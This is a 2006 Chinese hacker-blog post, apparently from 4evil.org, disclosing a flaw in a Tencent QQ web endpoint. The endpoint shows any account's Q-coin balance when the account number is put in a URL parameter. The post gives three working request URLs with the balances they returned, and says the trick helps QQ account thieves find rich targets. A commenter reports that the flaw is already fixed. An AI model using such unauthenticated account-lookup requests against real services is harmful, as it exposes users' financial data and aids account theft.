2006-01-04 20:10:11 by: h4x0r

QQ出现查任意号码QB漏洞

Font Size: Large | Medium | Small
这个漏洞可以查QQ任意号码帐帐户的余额

http://action.fo.qq.com/cgi-bin/gift/focallback.cgi?ResultCode=0&ResultInfo=OK&ErrorCode=0&VarItem=uin%3D186348709

这是查186348709QQ号码的帐户QB情况,

http://action.fo.qq.com/cgi-bin/gift/focallback.cgi?ResultCode=0&ResultInfo=OK&ErrorCode=0&VarItem=uin%3D10001

你还可以查10001 老马有多少QB呢!

个人帐户:179.22Q币;游戏点帐户:游戏点

您已经兑换成功 游戏点,请稍后查看您的游戏点帐户。

在看看QQ号为12345的 闪亮新主播

http://action.fo.qq.com/cgi-bin/gift/focallback.cgi?ResultCode=0&ResultInfo=OK&ErrorCode=0&VarItem=uin%3D12345

个人帐户:6279.00Q币;游戏点帐户:游戏点

您已经兑换成功 游戏点,请稍后查看您的游戏点帐户。

汗啊,6279个QB..........
这个漏洞为盗QQ的人提供了方便,不用一个个号码登陆去看QB有多少了。直接利用此方法即可知道。:)
[Last Modified By h4x0r, at 2006-01-04 21:15:42]
Comments Feed Comments Feed: http://www.4evil.org/feed.asp?q=comment&id=462

View Mode: Show All | Comments: 1 Trackbacks: 0 Toggle Order | Views: 735
Quote mali
[ 2006-01-05 09:52:40 ]
已经失效了.

Post Comment
Smilies
[smile] [confused] [cool] [cry]
[eek] [angry] [wink] [sweat]
[lol] [stun] [razz] [redface]
[rolleyes] [sad] [yes] [no]
[heart] [star] [music] [idea]
Enable UBB Codes
Auto Convert URL
Show Smilies
Hidden Comment
Username:   Password:   Register Now?
Security Code * Please Enter the Security Code